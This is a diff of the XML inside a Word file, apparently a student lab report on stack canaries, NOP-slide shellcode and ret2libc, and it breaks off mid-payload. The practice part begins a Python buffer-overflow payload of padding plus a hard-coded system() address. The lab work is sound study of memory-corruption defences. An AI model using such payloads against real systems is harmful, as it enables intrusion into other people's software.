         <w:fldChar w:fldCharType="separate"/>
       </w:r>
       <w:r>
+        <w:rPr/>
+      </w:r>
+      <w:r>
+        <w:rPr/>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Nadpis1"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t>Stack Canaries</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="0"/>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:lang w:val="cs-CZ"/>
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This exercise is using stack canaries to ensure the return address of the function was not tampered with. We use GDB to find which canaries are in the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>stack_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>canaries</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> array. For our canary we used number </w:t>
+        <w:rPr/>
+        <w:t xml:space="preserve">This exercise is using stack canaries to ensure the return address of the function was not tampered with. We use GDB to find which canaries are in the stack_canaries array. For our canary we used number </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="cs-CZ"/>
         </w:rPr>
-        <w:t>1271845313</w:t>
-      </w:r>
-      <w:r>
+        <w:t>1271845313, because when transfered into bytes, it has no „bad characters“. We use the NOP slide technique (creating slide with shellscript and overwriting the return address to point in the middle of the slide). The program has to be run multiple times, for our canary to be the same as the chosen one by program randomly.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:lang w:val="cs-CZ"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="cs-CZ"/>
         </w:rPr>
-        <w:t>because</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>when</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>transfered</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>into</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>bytes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>it</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> has no „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>bad</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>characters</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>We</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> NOP slide </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>technique</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>creating</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> slide </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>with</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>shellscript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>overwriting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> return </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>address</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to point in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>middle</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> slide). </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>The</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> program has to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>be</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> run </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>multiple</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>times</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>our</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>canary</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>be</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>same</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>chosen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>one</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> by program </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>randomly</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="cs-CZ"/>
-        </w:rPr>
         <w:t>Solution.sh script:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D911D42" wp14:editId="6A60C3EB">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5399405" cy="4640580"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="551315997" name="Obrázek 1"/>
+            <wp:docPr id="2" name="Obrázek 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -847,16 +441,18 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="551315997" name=""/>
-                    <pic:cNvPicPr/>
+                    <pic:cNvPr id="2" name="Obrázek 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId3"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr>
+                  <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
                       <a:ext cx="5399405" cy="4640580"/>
@@ -864,6 +460,7 @@
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:noFill/>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -874,397 +471,410 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Nadpis1"/>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Ret2Libc</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Nadpis2"/>
+        <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Theory</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Picture"/>
         <w:jc w:val="both"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Menlo"/>
           <w:color w:val="000000"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
           <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
         </w:rPr>
-        <w:t>Lorem</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Menlo"/>
           <w:color w:val="000000"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
           <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+        <w:t>For the first exercise:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="360" w:before="120" w:after="240"/>
+        <w:ind w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:cs="Menlo"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
           <w:color w:val="000000"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
           <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
         </w:rPr>
-        <w:t>Ipsum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="4" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5399405" cy="3964940"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="3" name="Image1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="3" name="Image1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId4"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5399405" cy="3964940"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Menlo"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
           <w:color w:val="000000"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
           <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Nadpis2"/>
+        <w:t>With this approach, f_addr acts as a ret system call and uses g_addr as the direction of the function we want to jump, and we finish the execution reading the argument of the f function. After that, the program jumps to the g function with both of its arguments.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="360" w:before="120" w:after="240"/>
+        <w:ind w:hanging="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:cs="Menlo"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Menlo"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
+        </w:rPr>
+        <w:t>On the second exercise: Yes, it will be problematic because if the function f expects more than one parameters it will use the g_addr as a second parameter, finishing the execution and trying to return to f_arg1. This last address points to data and not a funcion, so the program will crash trying to jump on this data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>On the third exercise: We cannot add a third function without breaking the program. On the way we’re filling the stack, trying to call a third function would force us to change the order of the values. If we put h_addr on the stack we would need to change one argument on g function, and we cannot pass an argument and a return address on the same space.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Practice</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:rPr/>
         <w:t>On the first task, the script solution.sh is the following:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang/>
-        </w:rPr>
+        <w:ind w:hanging="0"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>python3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
-          <w:lang/>
         </w:rPr>
         <w:t>-c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>import sys</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>from struct import pack # this makes easier to write addresses on little indian format</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>payload = b"A" * 112 # padding</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
-        <w:ind w:firstLine="0"/>
+        <w:ind w:hanging="0"/>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7e15360) # system func address. obtained with print system (inside gdb ret2libc)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
